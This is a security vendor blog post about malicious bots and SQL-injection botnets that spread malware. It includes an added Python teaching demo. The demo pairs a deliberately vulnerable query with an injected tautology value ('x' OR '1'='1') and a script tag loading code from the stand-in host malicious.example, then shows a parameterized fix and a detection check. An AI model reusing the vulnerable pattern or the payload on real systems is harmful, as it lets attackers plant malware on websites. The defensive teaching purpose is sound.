Bad Bots Create Cyber Security Headaches

Malicious bots present a unique challenge for cyber security organizations. The prevalence of these bad bots -- most commonly associated with DDoS attacks, click fraud, vulnerability scanning, spam and malware distribution -- is steadily increasing.

In a recent article on Dark Reading, the author states that while the overall population of bots shrank by 5% over 2013, the presence of bad bots is up 15%. There has also been a sharp rise in bad bots created at enterprise endpoints. The study showed that the proportion of organizations found with bad bots inside their network jumped from 63% in 2012 to 73% in 2013.

In some cases, it was determined that certain bad bots were active for up to four months before any type of detection occurred. This is not that surprising when you factor in the number of endpoints most enterprises have connecting to the Internet.

SQLi (SQL Injection) bots help malware authors inject malicious scripts into websites, which can lead to compromised infrastructure. This is a popular way to spread exploit kits capable of dropping Trojans, Spyware and Ransomware. The Asprox botnet was an early example of spreading SQL injection via botnets. Of course, Asprox has resurfaced recently in a slew of phishing campaigns targeting end users of major US retailers.
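To make the mechanism concrete, here is an added example (not code from the original post, and not a reconstruction of Asprox's actual tooling) of how a single string-built SQL statement lets an automated injection turn every page of a site into a carrier for a third-party script, beside the parameterized form that stops it. The table layout, the `malicious.example` script URL and the `x' OR '1'='1` input are constructed for the demo; the detection helper at the end is the kind of check a defender would run over stored content, since the page notes that such bots can go undetected for months.

```python
import sqlite3

# Constructed toy schema: a CMS-style table holding the HTML body of each page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (title, body) VALUES (?, ?)",
        [("home", "<p>Welcome</p>"), ("about", "<p>About us</p>")],
    )
    conn.commit()
    return conn

def update_body_vulnerable(conn, title, new_body):
    # Defect on purpose: user input is pasted into the SQL text, so the WHERE
    # clause can be rewritten by the caller. Returns the number of rows changed.
    sql = "UPDATE pages SET body = '%s' WHERE title = '%s'" % (new_body, title)
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount

def update_body_safe(conn, title, new_body):
    # Hardened form: bound parameters are never interpreted as SQL, so a title
    # of "x' OR '1'='1" is just a literal string that matches no row.
    cur = conn.execute(
        "UPDATE pages SET body = ? WHERE title = ?", (new_body, title)
    )
    conn.commit()
    return cur.rowcount

def pages_with_foreign_script(conn):
    # Defender-side check: list pages whose stored HTML now embeds a script tag.
    # A real deployment would compare against an allow-list of known script hosts.
    rows = conn.execute("SELECT title, body FROM pages ORDER BY title").fetchall()
    return [title for title, body in rows if "<script" in body.lower()]

if __name__ == "__main__":
    # Constructed payload: a tautology in the title makes the UPDATE hit every row.
    injected_title = "x' OR '1'='1"
    injected_body = '<script src="https://malicious.example/x.js"></script>'

    vuln = make_db()
    print("vulnerable rows changed:", update_body_vulnerable(vuln, injected_title, injected_body))
    print("pages now carrying a script:", pages_with_foreign_script(vuln))

    safe = make_db()
    print("safe rows changed:", update_body_safe(safe, injected_title, injected_body))
    print("pages now carrying a script:", pages_with_foreign_script(safe))
```

The point of the contrast is that the same two inputs modify two rows through the concatenated query and zero rows through the parameterized one; the injected body is also rejected as a page title because it is compared as data rather than parsed as SQL.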

Bad bots are contributing to the spread of malware and other harmful web-based threats such as spam linking to malicious websites or doctored web pages designed to phish user data. The problem is that enterprises and other online-based organizations rely on imperfect and vulnerable components to connect to the web and to end users. This creates software vulnerabilities that can be exploited to turn websites and mobile applications into tools for stealing user data.

Our area of expertise is digital asset security and digital brand security. This is a new area in information security technology and one that comes with unique technical challenges. Enterprise security teams face a difficult challenge when trying to use internal security tools to prevent their web properties from being compromised. This can lead to poor user experience and stolen data.

Many companies don't even maintain an up-to-date inventory of their branded digital assets. This can be a result of shadow IT, lack of communication between developers and the security team, or third-party developers intentionally creating branded rogue assets (we observe branded rogues more often in mobile). Because of this, many brands aren't in a position to respond swiftly if a website or mobile application has been hijacked and is spreading malware or phishing for private data.

RiskIQ's technology is designed to experience websites and mobile apps from the perspective of the end user. Major brands can leverage this new vantage point and the specialized products we offer to hunt down and remove dangerous, online, outward-facing threats. For further information on this, please review RiskIQ for Web and RiskIQ for Mobile.
